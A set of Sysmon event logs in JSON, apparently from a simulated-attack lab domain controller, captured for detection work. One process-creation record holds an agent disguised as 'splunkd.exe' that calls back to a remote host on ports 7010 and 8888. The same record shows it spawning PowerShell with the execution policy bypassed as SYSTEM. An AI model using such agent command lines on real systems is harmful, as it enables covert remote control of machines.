{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1627,"ProcessID":2804,"ThreadID":3364,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:03.393\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xennet.sys\r\nHashes: MD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 07:53:03.393","ImageLoaded":"C:\\Windows\\System32\\drivers\\xennet.sys","Hashes":"MD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1628,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.636\r\nProcessGuid: {41C8662E-1F74-5F25-0000-001019510300}\r\nProcessId: 3696\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: powershell.exe -ExecutionPolicy Bypass -C axqtro\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nParentProcessId: 2956\r\nParentImage: C:\\Users\\Public\\splunkd.exe\r\nParentCommandLine: \"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.636","ProcessGuid":"{41C8662E-1F74-5F25-0000-001019510300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"powershell.exe -ExecutionPolicy Bypass -C axqtro","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-1F69-5F25-0000-0010B7860200}","ParentProcessId":"2956","ParentImage":"C:\\Users\\Public\\splunkd.exe","ParentCommandLine":"\"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1629,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.636\r\nSourceProcessGUID: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nSourceProcessId: 2956\r\nSourceThreadId: 2128\r\nSourceImage: C:\\Users\\Public\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001019510300}\r\nTargetProcessId: 3696\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Users\\Public\\splunkd.exe+5c36e","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.636","SourceProcessGUID":"{41C8662E-1F69-5F25-0000-0010B7860200}","SourceProcessId":"2956","SourceThreadId":"2128","SourceImage":"C:\\Users\\Public\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001019510300}","TargetProcessId":"3696","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Users\\Public\\splunkd.exe+5c36e","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1630,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.636\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001019510300}\r\nTargetProcessId: 3696\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.636","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001019510300}","TargetProcessId":"3696","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1631,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.636\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.636","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1632,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.636\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.636","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1633,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.637\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.637","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1634,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.637\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.637","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1635,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.637\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.637","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1636,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.637\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 